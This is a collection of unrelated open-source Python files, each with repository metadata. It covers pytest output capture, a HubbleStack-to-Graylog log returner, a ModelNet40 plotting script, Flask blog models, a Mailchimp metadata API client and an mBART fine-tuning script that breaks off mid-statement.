""" stop capturing, restore streams, return original capture file,
seeked to position zero. """
targetfd_save = self.__dict__.pop("targetfd_save")
os.dup2(targetfd_save, self.targetfd)
os.close(targetfd_save)
self.syscapture.done()
self.tmpfile.close()
self._state = "done"
def suspend(self):
self.syscapture.suspend()
os.dup2(self.targetfd_save, self.targetfd)
self._state = "suspended"
def resume(self):
self.syscapture.resume()
os.dup2(self.tmpfile_fd, self.targetfd)
self._state = "resumed"
def writeorg(self, data):
""" write to original file descriptor. """
if isinstance(data, str):
data = data.encode("utf8") # XXX use encoding of original stream
os.write(self.targetfd_save, data)
class FDCapture(FDCaptureBinary):
"""Capture IO to/from a given os-level filedescriptor.
snap() produces text
"""
# Ignore type because it doesn't match the type in the superclass (bytes).
EMPTY_BUFFER = str() # type: ignore
def snap(self):
res = super().snap()
enc = getattr(self.tmpfile, "encoding", None)
if enc and isinstance(res, bytes):
res = str(res, enc, "replace")
return res
class SysCapture:
CLOSE_STDIN = object
EMPTY_BUFFER = str()
_state = None
def __init__(self, fd, tmpfile=None, stdin=CLOSE_STDIN):
name = patchsysdict[fd]
self._old = getattr(sys, name)
self.name = name
if tmpfile is None:
if name == "stdin":
if stdin is self.CLOSE_STDIN:
tmpfile = DontReadFromInput()
else:
tmpfile = stdin
else:
tmpfile = CaptureIO()
self.tmpfile = tmpfile
def __repr__(self):
return "<SysCapture {} _old={!r}, tmpfile={!r} _state={!r}>".format(
self.name, self._old, self.tmpfile, self._state
)
def start(self):
setattr(sys, self.name, self.tmpfile)
self._state = "started"
def snap(self):
res = self.tmpfile.getvalue()
self.tmpfile.seek(0)
self.tmpfile.truncate()
return res
def done(self):
setattr(sys, self.name, self._old)
del self._old
self.tmpfile.close()
self._state = "done"
def suspend(self):
setattr(sys, self.name, self._old)
self._state = "suspended"
def resume(self):
setattr(sys, self.name, self.tmpfile)
self._state = "resumed"
def writeorg(self, data):
self._old.write(data)
self._old.flush()
class SysCaptureBinary(SysCapture):
# Ignore type because it doesn't match the type in the superclass (str).
EMPTY_BUFFER = b"" # type: ignore
def snap(self):
res = self.tmpfile.buffer.getvalue()
self.tmpfile.seek(0)
self.tmpfile.truncate()
return res
class DontReadFromInput:
encoding = None
def read(self, *args):
raise IOError(
"pytest: reading from stdin while output is captured! Consider using `-s`."
)
readline = read
readlines = read
__next__ = read
def __iter__(self):
return self
def fileno(self):
raise UnsupportedOperation("redirected stdin is pseudofile, has no fileno()")
def isatty(self):
return False
def close(self):
pass
@property
def buffer(self):
return self
def _colorama_workaround():
"""
Ensure colorama is imported so that it attaches to the correct stdio
handles on Windows.
colorama uses the terminal on import time. So if something does the
first import of colorama while I/O capture is active, colorama will
fail in various ways.
"""
if sys.platform.startswith("win32"):
try:
import colorama # noqa: F401
except ImportError:
pass
def _readline_workaround():
"""
Ensure readline is imported so that it attaches to the correct stdio
handles on Windows.
Pdb uses readline support where available--when not running from the Python
prompt, the readline module is not imported until running the pdb REPL. If
running pytest with the --pdb option this means the readline module is not
imported until after I/O capture has been started.
This is a problem for pyreadline, which is often used to implement readline
support on Windows, as it does not attach to the correct handles for stdout
and/or stdin if they have been redirected by the FDCapture mechanism. This
workaround ensures that readline is imported before I/O capture is setup so
that it can attach to the actual stdin/out for the console.
See https://github.com/pytest-dev/pytest/pull/1281
"""
if sys.platform.startswith("win32"):
try:
import readline # noqa: F401
except ImportError:
pass
def _py36_windowsconsoleio_workaround(stream):
"""
Python 3.6 implemented unicode console handling for Windows. This works
by reading/writing to the raw console handle using
``{Read,Write}ConsoleW``.
The problem is that we are going to ``dup2`` over the stdio file
descriptors when doing ``FDCapture`` and this will ``CloseHandle`` the
handles used by Python to write to the console. Though there is still some
weirdness and the console handle seems to only be closed randomly and not
on the first call to ``CloseHandle``, or maybe it gets reopened with the
same handle value when we suspend capturing.
The workaround in this case will reopen stdio with a different fd which
also means a different handle by replicating the logic in
"Py_lifecycle.c:initstdio/create_stdio".
:param stream: in practice ``sys.stdout`` or ``sys.stderr``, but given
here as parameter for unittesting purposes.
See https://github.com/pytest-dev/py/issues/103
"""
if (
not sys.platform.startswith("win32")
or sys.version_info[:2] < (3, 6)
or hasattr(sys, "pypy_version_info")
):
return
# bail out if ``stream`` doesn't seem like a proper ``io`` stream (#2666)
if not hasattr(stream, "buffer"):
return
buffered = hasattr(stream.buffer, "raw")
raw_stdout = stream.buffer.raw if buffered else stream.buffer
if not isinstance(raw_stdout, io._WindowsConsoleIO):
return
def _reopen_stdio(f, mode):
if not buffered and mode[0] == "w":
buffering = 0
else:
buffering = -1
return io.TextIOWrapper(
open(os.dup(f.fileno()), mode, buffering),
f.encoding,
f.errors,
f.newlines,
f.line_buffering,
)
sys.stdin = _reopen_stdio(sys.stdin, "rb")
sys.stdout = _reopen_stdio(sys.stdout, "wb")
sys.stderr = _reopen_stdio(sys.stderr, "wb")
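# Editor's note: illustrative sketch, not part of the original module.  The
# capture plumbing above is normally reached through pytest's public
# ``capsys``/``capfd`` fixtures rather than by instantiating MultiCapture
# directly; the test name and the asserted text below are arbitrary examples.
def _example_test_prints_greeting(capsys):
    print("hello")
    captured = capsys.readouterr()
    assert captured.out == "hello\n"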
| 32.178182
| 117
| 0.628207
|
978502ad6a23b5f493efdd1da35eb74eaf6dd73b
| 5,691
|
py
|
Python
|
hubblestack/extmods/returners/graylog_nebula_return.py
|
NerdsvilleCEO/hubble
|
200dc8bc2075da5753b2424f1597d806a4139d41
|
[
"Apache-2.0"
] | null | null | null |
hubblestack/extmods/returners/graylog_nebula_return.py
|
NerdsvilleCEO/hubble
|
200dc8bc2075da5753b2424f1597d806a4139d41
|
[
"Apache-2.0"
] | null | null | null |
hubblestack/extmods/returners/graylog_nebula_return.py
|
NerdsvilleCEO/hubble
|
200dc8bc2075da5753b2424f1597d806a4139d41
|
[
"Apache-2.0"
] | null | null | null |
# -*- encoding: utf-8 -*-
'''
HubbleStack Nebula-to-graylog (http input) returner
Deliver HubbleStack Nebula query data into graylog using the HTTP input
plugin. Required config/pillar settings:
.. code-block:: yaml
hubblestack:
returner:
graylog:
- port: 12202
proxy: {}
timeout: 10
gelfhttp_ssl: True
sourcetype_nebula: hubble_osquery
sourcetype_pulsar: hubble_fim
sourcetype_nova: hubble_audit
gelfhttp: http://graylog-gelf-http-input-addr
'''
import json
import time
import requests
from datetime import datetime
def returner(ret):
    '''
    Aggregate the Nebula osquery results in ``ret`` and POST them, one event
    at a time, to the configured Graylog GELF HTTP input(s).
    '''
opts_list = _get_options()
# Get cloud details
cloud_details = __grains__.get('cloud_details', {})
for opts in opts_list:
proxy = opts['proxy']
timeout = opts['timeout']
custom_fields = opts['custom_fields']
gelfhttp = opts['gelfhttp']
port = opts['port']
# assign all the things
data = ret['return']
minion_id = ret['id']
jid = ret['jid']
master = __grains__['master']
fqdn = __grains__['fqdn']
fqdn = fqdn if fqdn else minion_id
try:
fqdn_ip4 = __grains__['fqdn_ip4'][0]
        except KeyError:
fqdn_ip4 = __grains__['ipv4'][0]
if fqdn_ip4.startswith('127.'):
for ip4_addr in __grains__['ipv4']:
if ip4_addr and not ip4_addr.startswith('127.'):
fqdn_ip4 = ip4_addr
break
if not data:
return
else:
for query in data:
for query_name, query_results in query.iteritems():
for query_result in query_results['data']:
event = {}
payload = {}
event.update(query_result)
event.update({'query': query_name})
event.update({'job_id': jid})
event.update({'master': master})
event.update({'minion_id': minion_id})
event.update({'dest_host': fqdn})
event.update({'dest_ip': fqdn_ip4})
event.update(cloud_details)
for custom_field in custom_fields:
custom_field_name = 'custom_' + custom_field
custom_field_value = __salt__['config.get'](custom_field, '')
if isinstance(custom_field_value, str):
event.update({custom_field_name: custom_field_value})
elif isinstance(custom_field_value, list):
custom_field_value = ','.join(custom_field_value)
event.update({custom_field_name: custom_field_value})
payload.update({'host': fqdn})
payload.update({'_sourcetype': opts['sourcetype']})
payload.update({'short_message': 'hubblestack'})
payload.update({'hubblemsg': event})
# If the osquery query includes a field called 'time' it will be checked.
# If it's within the last year, it will be used as the eventtime.
event_time = query_result.get('time', '')
try:
if (datetime.fromtimestamp(time.time()) - datetime.fromtimestamp(float(event_time))).days > 365:
event_time = ''
except:
event_time = ''
finally:
rdy = json.dumps(payload)
requests.post('{}:{}/gelf'.format(gelfhttp, port), rdy)
return
def _get_options():
if __salt__['config.get']('hubblestack:returner:graylog'):
graylog_opts = []
returner_opts = __salt__['config.get']('hubblestack:returner:graylog')
if not isinstance(returner_opts, list):
returner_opts = [returner_opts]
for opt in returner_opts:
processed = {}
processed['gelfhttp'] = opt.get('gelfhttp')
processed['port'] = str(opt.get('port', '12022'))
processed['custom_fields'] = opt.get('custom_fields', [])
processed['sourcetype'] = opt.get('sourcetype_nebula', 'hubble_osquery')
processed['gelfhttp_ssl'] = opt.get('gelfhttp_ssl', True)
processed['proxy'] = opt.get('proxy', {})
processed['timeout'] = opt.get('timeout', 9.05)
graylog_opts.append(processed)
return graylog_opts
else:
try:
port = __salt__['config.get']('hubblestack:returner:graylog:port')
gelfhttp = __salt__['config.get']('hubblestack:returner:graylog:gelfhttp')
sourcetype = __salt__['config.get']('hubblestack:nebula:returner:graylog:sourcetype')
custom_fields = __salt__['config.get']('hubblestack:nebula:returner:graylog:custom_fields', [])
except:
return None
graylog_opts = {'gelfhttp': gelfhttp, 'sourcetype': sourcetype, 'custom_fields': custom_fields}
gelfhttp_ssl = __salt__['config.get']('hubblestack:nebula:returner:graylog:gelfhttp_ssl', True)
graylog_opts['http_input_server_ssl'] = gelfhttp_ssl
graylog_opts['proxy'] = __salt__['config.get']('hubblestack:nebula:returner:graylog:proxy', {})
graylog_opts['timeout'] = __salt__['config.get']('hubblestack:nebula:returner:graylog:timeout', 9.05)
return [graylog_opts]
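# Editor's note: illustrative sketch, not part of the original returner.  It
# mirrors the per-result payload that returner() assembles and posts to a
# Graylog GELF HTTP input; the host names, sourcetype and endpoint URL below
# are placeholder assumptions, not values read from hubblestack config.
def _example_post_single_event():
    event = {'query': 'running_procs', 'minion_id': 'minion01',
             'dest_host': 'host01.example.com', 'dest_ip': '10.0.0.5'}
    payload = {'host': 'host01.example.com',
               '_sourcetype': 'hubble_osquery',
               'short_message': 'hubblestack',
               'hubblemsg': event}
    rdy = json.dumps(payload)
    requests.post('http://graylog.example.com:12201/gelf', rdy)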
| 40.077465
| 124
| 0.549464
|
4fa841d400a47a4f11331889867f11c025ddb3da
| 1,379
|
py
|
Python
|
tensorflow_graphics/datasets/modelnet40/modelnet40_show.py
|
jackd/graphics
|
736b99a3306e302674a9b7599e3e2857b85fdb74
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_graphics/datasets/modelnet40/modelnet40_show.py
|
jackd/graphics
|
736b99a3306e302674a9b7599e3e2857b85fdb74
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_graphics/datasets/modelnet40/modelnet40_show.py
|
jackd/graphics
|
736b99a3306e302674a9b7599e3e2857b85fdb74
|
[
"Apache-2.0"
] | 1
|
2020-04-11T10:37:36.000Z
|
2020-04-11T10:37:36.000Z
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Visualization in 3D of modelnet40 dataset.
See: https://www.tensorflow.org/datasets/api_docs/python/tfds/load
"""
from absl import app
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D # pylint:disable=unused-import
from tensorflow_graphics.datasets.modelnet40 import ModelNet40
def main(_):
ds_train, _ = ModelNet40.load(
split="train", data_dir="~/tensorflow_dataset", with_info=True)
for example in ds_train.take(1):
points = example["points"]
label = example["label"]
fig = plt.figure()
ax3 = fig.add_subplot(111, projection="3d")
ax3.set_title("Example with label {}".format(label))
scatter3 = lambda p, c="r", *args: ax3.scatter(p[:, 0], p[:, 1], p[:, 2], c)
scatter3(points)
if __name__ == "__main__":
app.run(main)
| 32.833333
| 78
| 0.730239
|
9b42abf44bc80c7834b7b555428a7a7433294b2b
| 4,460
|
py
|
Python
|
app/models.py
|
dan-jugz/stranger-blogs
|
78dcfff2cb8f40a0e6fa079f14afbb7850f4ae18
|
[
"MIT"
] | null | null | null |
app/models.py
|
dan-jugz/stranger-blogs
|
78dcfff2cb8f40a0e6fa079f14afbb7850f4ae18
|
[
"MIT"
] | null | null | null |
app/models.py
|
dan-jugz/stranger-blogs
|
78dcfff2cb8f40a0e6fa079f14afbb7850f4ae18
|
[
"MIT"
] | null | null | null |
from . import db
from flask_login import UserMixin
from werkzeug.security import generate_password_hash, check_password_hash
from . import login_manager
from datetime import datetime
@login_manager.user_loader
def load_user(user_id):
return Writer.query.get(int(user_id))
class Writer(UserMixin,db.Model):
"""
This class allows us to have a writers table that has the following columns:
1. id
2. writer_name
3. email
4. password
5. writer_blog
"""
__tablename__ = 'writers'
id = db.Column(db.Integer, primary_key=True)
writer_name = db.Column(db.String(50))
email = db.Column(db.String(64),unique=True,index=True)
profile_image=db.Column(db.String(64),default='default_profile.png')
password_hash = db.Column(db.String(255))
writer_blog = db.relationship('Blog', backref="writer", lazy='dynamic')
comments_user=db.relationship('Comment',backref='commenter',lazy="dynamic")
subscriber_id=db.relationship('Subscriber',backref='writer',lazy='dynamic')
@property
def password(self):
raise AttributeError('Access denied')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
def __repr__(self):
return "Writer {}".format(self.writer_name)
class Blog(db.Model):
"""
This class allows to create blogs table that will have the following columns:
1. id
2. title
3. body
4. posted_at
5. writer_id
5. posted_by
6. writer_url
7. comment_id
"""
__tablename__ = 'blogs'
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String)
body = db.Column(db.String)
posted_at = db.Column(db.DateTime, default=datetime.utcnow)
writer_id = db.Column(db.Integer, db.ForeignKey('writers.id'))
writer_url = db.Column(db.String)
posted_by = db.Column(db.String)
comment_id = db.relationship('Comment', backref="comment_ids", lazy="dynamic")
def save_blog(self):
db.session.add(self)
db.session.commit()
@classmethod
def get_posts(cls):
'''
Function that fetches all blog posts regardless of the writer
'''
posts=Blog.query.order_by(Blog.posted_at.desc()).all()
return posts
@classmethod
def get_user_posts(cls,writer_id,page):
'''
Function that fetches all blog posts for a single writer
'''
        posts_user = Blog.query.filter_by(writer_id=writer_id).order_by(Blog.posted_at.desc()).paginate(page=page, per_page=5)
return posts_user
def __repr__(self):
        return f'PostID:{self.id}--Date:{self.posted_at}--Title:{self.title}'
class Comment(db.Model):
"""
This class helps us to be able to create a comments table that has:
1. id column
2. comment column
3. commented_on column
4. blog_id column
"""
    __tablename__ = 'comments'
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String)
comment = db.Column(db.String)
commented_on = db.Column(db.DateTime, default=datetime.utcnow)
blog_id = db.Column(db.Integer, db.ForeignKey('blogs.id'))
writer_id = db.Column(db.Integer, db.ForeignKey('writers.id'))
    def save_comment(self):
        '''
        Function that saves a new comment
        '''
        db.session.add(self)
        db.session.commit()
@classmethod
def get_comments(cls,blog_id):
'''
Function that fetches a specific post comment
'''
comments=Comment.query.filter_by(blog_id=blog_id).all()
return comments
class Quote:
"""
This class helps to design Quotes data to have:
1. quote
2. author
"""
def __init__(self, quote, author):
"""
This method allows us to instantiate an instance.
"""
self.quote = quote
self.author = author
class Subscriber(db.Model):
__tablename__ = "subscribers"
id = db.Column(db.Integer, primary_key=True)
subscriber = db.Column(db.String(12))
writer_id = db.Column(db.Integer, db.ForeignKey('writers.id'))
email = db.Column(db.String)
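# Editor's note: illustrative sketch, not part of the original models.  It
# shows how the password property and verify_password() above are intended to
# be used; the name/email values are arbitrary and the commit assumes an
# application context with a configured database.
def _example_create_writer():
    writer = Writer(writer_name='jane', email='jane@example.com')
    writer.password = 'correct horse battery staple'  # stored only as a hash
    assert writer.verify_password('correct horse battery staple')
    db.session.add(writer)
    db.session.commit()
    return writer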
| 28.961039
| 116
| 0.640583
|
2bd9e3beb5ccb0ef861e6d145c0fae5b73df37e7
| 6,076
|
py
|
Python
|
mailchimp_transactional/api/metadata_api.py
|
mailchimp/mailchimp-transactional-python
|
13984adc51f8a91a08c8b282d25c6752ba0375c4
|
[
"Apache-2.0"
] | 21
|
2020-08-31T16:24:14.000Z
|
2022-03-16T17:18:36.000Z
|
build/lib/mailchimp_transactional/api/metadata_api.py
|
mailchimp/mailchimp-transactional-python
|
13984adc51f8a91a08c8b282d25c6752ba0375c4
|
[
"Apache-2.0"
] | null | null | null |
build/lib/mailchimp_transactional/api/metadata_api.py
|
mailchimp/mailchimp-transactional-python
|
13984adc51f8a91a08c8b282d25c6752ba0375c4
|
[
"Apache-2.0"
] | 5
|
2021-02-02T10:17:43.000Z
|
2022-01-21T15:49:38.000Z
|
# coding: utf-8
"""
Mailchimp Transactional API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 1.0.46
Contact: apihelp@mailchimp.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from mailchimp_transactional.api_client import ApiClient
class MetadataApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_key='', api_client = None):
self.api_key = api_key
if api_client:
self.api_client = api_client
else:
self.api_client = ApiClient()
def add(self, body = {}, **kwargs): # noqa: E501
"""Add metadata field # noqa: E501
Add a new custom metadata field to be indexed for the account. # noqa: E501
"""
(data) = self.add_with_http_info(body, **kwargs) # noqa: E501
return data
def add_with_http_info(self, body, **kwargs): # noqa: E501
"""Add metadata field # noqa: E501
Add a new custom metadata field to be indexed for the account. # noqa: E501
"""
all_params = ['body'] # noqa: E501
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add" % key
)
params[key] = val
del params['kwargs']
# add api_key to body params
params['body']['key'] = self.api_key
body_params = None
if 'body' in params:
body_params = params['body']
return self.api_client.call_api(
'/metadata/add', 'POST',
body=body_params,
response_type='InlineResponse20037') # noqa: E501
def delete(self, body = {}, **kwargs): # noqa: E501
"""Delete metadata field # noqa: E501
        Delete an existing custom metadata field. Deletion isn't instantaneous, and /metadata/list will continue to return the field until the asynchronous deletion process is complete. # noqa: E501
"""
(data) = self.delete_with_http_info(body, **kwargs) # noqa: E501
return data
def delete_with_http_info(self, body, **kwargs): # noqa: E501
"""Delete metadata field # noqa: E501
        Delete an existing custom metadata field. Deletion isn't instantaneous, and /metadata/list will continue to return the field until the asynchronous deletion process is complete. # noqa: E501
"""
all_params = ['body'] # noqa: E501
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete" % key
)
params[key] = val
del params['kwargs']
# add api_key to body params
params['body']['key'] = self.api_key
body_params = None
if 'body' in params:
body_params = params['body']
return self.api_client.call_api(
'/metadata/delete', 'POST',
body=body_params,
response_type='InlineResponse20039') # noqa: E501
def list(self, body = {}, **kwargs): # noqa: E501
"""List metadata fields # noqa: E501
Get the list of custom metadata fields indexed for the account. # noqa: E501
"""
(data) = self.list_with_http_info(body, **kwargs) # noqa: E501
return data
def list_with_http_info(self, body, **kwargs): # noqa: E501
"""List metadata fields # noqa: E501
Get the list of custom metadata fields indexed for the account. # noqa: E501
"""
all_params = ['body'] # noqa: E501
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list" % key
)
params[key] = val
del params['kwargs']
# add api_key to body params
params['body']['key'] = self.api_key
body_params = None
if 'body' in params:
body_params = params['body']
return self.api_client.call_api(
'/metadata/list', 'POST',
body=body_params,
response_type='list[InlineResponse20036]') # noqa: E501
def update(self, body = {}, **kwargs): # noqa: E501
"""Update metadata field # noqa: E501
Update an existing custom metadata field. # noqa: E501
"""
(data) = self.update_with_http_info(body, **kwargs) # noqa: E501
return data
def update_with_http_info(self, body, **kwargs): # noqa: E501
"""Update metadata field # noqa: E501
Update an existing custom metadata field. # noqa: E501
"""
all_params = ['body'] # noqa: E501
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update" % key
)
params[key] = val
del params['kwargs']
# add api_key to body params
params['body']['key'] = self.api_key
body_params = None
if 'body' in params:
body_params = params['body']
return self.api_client.call_api(
'/metadata/update', 'POST',
body=body_params,
response_type='InlineResponse20038') # noqa: E501
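# Editor's note: illustrative usage sketch, not part of the generated client.
# The API key and field name are placeholders; add()/list() simply POST to the
# /metadata/* endpoints wired up above.
def _example_metadata_usage():
    api = MetadataApi(api_key='YOUR_API_KEY')
    api.add(body={'name': 'customer_id'})  # index a new custom metadata field
    return api.list(body={})               # fetch all indexed fields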
| 32.319149
| 198
| 0.575379
|
5457fa57e968e2791493b86cae1a857dac960e8b
| 14,176
|
py
|
Python
|
examples/seq2seq/finetune_trainer_base (2).py
|
Eymen3455/transformers
|
f6960bb82015b15b10e5dcea71fd43dc1e73e0b3
|
[
"Apache-2.0"
] | 1
|
2021-01-11T19:59:56.000Z
|
2021-01-11T19:59:56.000Z
|
examples/seq2seq/finetune_trainer_base (2).py
|
Eymen3455/transformers
|
f6960bb82015b15b10e5dcea71fd43dc1e73e0b3
|
[
"Apache-2.0"
] | null | null | null |
examples/seq2seq/finetune_trainer_base (2).py
|
Eymen3455/transformers
|
f6960bb82015b15b10e5dcea71fd43dc1e73e0b3
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import sys
from dataclasses import dataclass, field
from typing import Optional
import transformers
from transformers import (
AutoConfig,
AutoModelForSeq2SeqLM,
AutoTokenizer,
HfArgumentParser,
MBartTokenizer,
MBartForConditionalGeneration,
MBartConfig,
Seq2SeqTrainer,
Seq2SeqTrainingArguments,
set_seed,
MBartModel,
)
from transformers.trainer_utils import EvaluationStrategy, is_main_process
from transformers.training_args import ParallelMode
from utils import (
Seq2SeqDataCollator,
Seq2SeqDataset,
assert_all_frozen,
build_compute_metrics_fn,
check_output_dir,
freeze_embeds,
freeze_params,
lmap,
save_json,
use_task_specific_params,
write_txt_file,
)
logger = logging.getLogger(__name__)
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
"""
model_name_or_path: str = field(
metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"}
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
)
    freeze_encoder: bool = field(default=False, metadata={"help": "Whether to freeze the encoder."})
freeze_embeds: bool = field(default=False, metadata={"help": "Whether to freeze the embeddings."})
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
data_dir: str = field(
metadata={"help": "The input data dir. Should contain the .tsv files (or other data files) for the task."}
)
task: Optional[str] = field(
default="summarization",
metadata={"help": "Task name, summarization (or summarization_{dataset} for pegasus) or translation"},
)
max_source_length: Optional[int] = field(
default=1024,
metadata={
"help": "The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded."
},
)
max_target_length: Optional[int] = field(
default=128,
metadata={
"help": "The maximum total sequence length for target text after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded."
},
)
val_max_target_length: Optional[int] = field(
default=142,
metadata={
"help": "The maximum total sequence length for validation target text after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded. "
"This argument is also used to override the ``max_length`` param of ``model.generate``, which is used "
"during ``evaluate`` and ``predict``."
},
)
test_max_target_length: Optional[int] = field(
default=142,
metadata={
"help": "The maximum total sequence length for test target text after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded."
},
)
n_train: Optional[int] = field(default=-1, metadata={"help": "# training examples. -1 means use all."})
n_val: Optional[int] = field(default=-1, metadata={"help": "# validation examples. -1 means use all."})
n_test: Optional[int] = field(default=-1, metadata={"help": "# test examples. -1 means use all."})
src_lang: Optional[str] = field(default=None, metadata={"help": "Source language id for translation."})
tgt_lang: Optional[str] = field(default=None, metadata={"help": "Target language id for translation."})
eval_beams: Optional[int] = field(default=None, metadata={"help": "# num_beams to use for evaluation."})
ignore_pad_token_for_loss: bool = field(
default=True,
metadata={"help": "If only pad tokens should be ignored. This assumes that `config.pad_token_id` is defined."},
)
def handle_metrics(split, metrics, output_dir):
"""
Log and save metrics
Args:
- split: one of train, val, test
- metrics: metrics dict
- output_dir: where to save the metrics
"""
logger.info(f"***** {split} metrics *****")
for key in sorted(metrics.keys()):
logger.info(f" {key} = {metrics[key]}")
save_json(metrics, os.path.join(output_dir, f"{split}_results.json"))
def main():
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, Seq2SeqTrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
check_output_dir(training_args)
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO if training_args.local_rank in [-1, 0] else logging.WARN,
)
logger.warning(
"Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, 16-bits training: %s",
training_args.local_rank,
training_args.device,
training_args.n_gpu,
bool(training_args.parallel_mode == ParallelMode.DISTRIBUTED),
training_args.fp16,
)
# Set the verbosity to info of the Transformers logger (on main process only):
if is_main_process(training_args.local_rank):
transformers.utils.logging.set_verbosity_info()
transformers.utils.logging.enable_default_handler()
transformers.utils.logging.enable_explicit_format()
logger.info("Training/evaluation parameters %s", training_args)
# Set seed
set_seed(training_args.seed)
# Load pretrained model and tokenizer
#
# Distributed training:
# The .from_pretrained methods guarantee that only one local process can concurrently
# download model & vocab.
config = MBartConfig.from_pretrained(
model_args.config_name if model_args.config_name else model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
)
extra_model_params = ("encoder_layerdrop", "decoder_layerdrop", "dropout", "attention_dropout")
for p in extra_model_params:
if getattr(training_args, p, None):
assert hasattr(config, p), f"({config.__class__.__name__}) doesn't have a `{p}` attribute"
setattr(config, p, getattr(training_args, p))
tokenizer = MBartTokenizer.from_pretrained(
model_args.tokenizer_name if model_args.tokenizer_name else model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
)
# model = MBartForConditionalGeneration.from_pretrained(
# model_args.model_name_or_path,
# from_tf=".ckpt" in model_args.model_name_or_path,
# config=config,
# cache_dir=model_args.cache_dir,
# )
# model = MBartForConditionalGeneration(config)
# model = MBartForConditionalGeneration.from_pretrained(model_args.config_name)
    model_config = MBartConfig(
        vocab_size=300,
        d_model=10,
        encoder_layers=1,
        decoder_layers=1,
        encoder_attention_heads=1,
        decoder_attention_heads=1,
        encoder_ffn_dim=10,
        decoder_ffn_dim=10,
        max_position_embeddings=512,
    )
model = MBartModel(config=model_config)
# use task specific params
use_task_specific_params(model, data_args.task)
# set num_beams for evaluation
if data_args.eval_beams is None:
data_args.eval_beams = model.config.num_beams
# set decoder_start_token_id for MBart
if model.config.decoder_start_token_id is None and isinstance(tokenizer, MBartTokenizer):
assert (
data_args.tgt_lang is not None and data_args.src_lang is not None
), "mBart requires --tgt_lang and --src_lang"
model.config.decoder_start_token_id = tokenizer.lang_code_to_id[data_args.tgt_lang]
if model_args.freeze_embeds:
freeze_embeds(model)
if model_args.freeze_encoder:
freeze_params(model.get_encoder())
assert_all_frozen(model.get_encoder())
dataset_class = Seq2SeqDataset
# Get datasets
train_dataset = (
dataset_class(
tokenizer,
type_path="train",
data_dir=data_args.data_dir,
n_obs=data_args.n_train,
max_target_length=data_args.max_target_length,
max_source_length=data_args.max_source_length,
prefix=model.config.prefix or "",
)
if training_args.do_train
else None
)
eval_dataset = (
dataset_class(
tokenizer,
type_path="val",
data_dir=data_args.data_dir,
n_obs=data_args.n_val,
max_target_length=data_args.val_max_target_length,
max_source_length=data_args.max_source_length,
prefix=model.config.prefix or "",
)
if training_args.do_eval or training_args.evaluation_strategy != EvaluationStrategy.NO
else None
)
test_dataset = (
dataset_class(
tokenizer,
type_path="test",
data_dir=data_args.data_dir,
n_obs=data_args.n_test,
max_target_length=data_args.test_max_target_length,
max_source_length=data_args.max_source_length,
prefix=model.config.prefix or "",
)
if training_args.do_predict
else None
)
# Initialize our Trainer
compute_metrics_fn = (
build_compute_metrics_fn(data_args.task, tokenizer) if training_args.predict_with_generate else None
)
trainer = Seq2SeqTrainer(
